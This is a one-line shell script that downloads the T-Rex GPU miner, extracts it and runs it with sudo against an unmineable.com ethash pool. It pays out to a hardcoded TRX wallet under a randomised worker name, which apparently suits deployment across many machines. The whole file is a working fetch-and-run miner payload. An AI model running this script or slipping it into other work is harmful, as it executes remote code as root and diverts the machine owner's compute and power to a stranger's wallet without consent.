#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.19.14-linux-cuda11.1.tar.gz && tar -xvf t-rex-0.19.14-linux-cuda11.1.tar.gz && sudo ./t-rex -a ethash -o ethash.unmineable.com:3333 -u TRX:TQ6EbnnJmwpEbDmisRFz1ZMc9FunZsfEVE.$(echo $(shuf -i 2-5 -n 1)-$(shuf -i 1-111 -n 1)-chaz#ln9q-3xm0) -p x
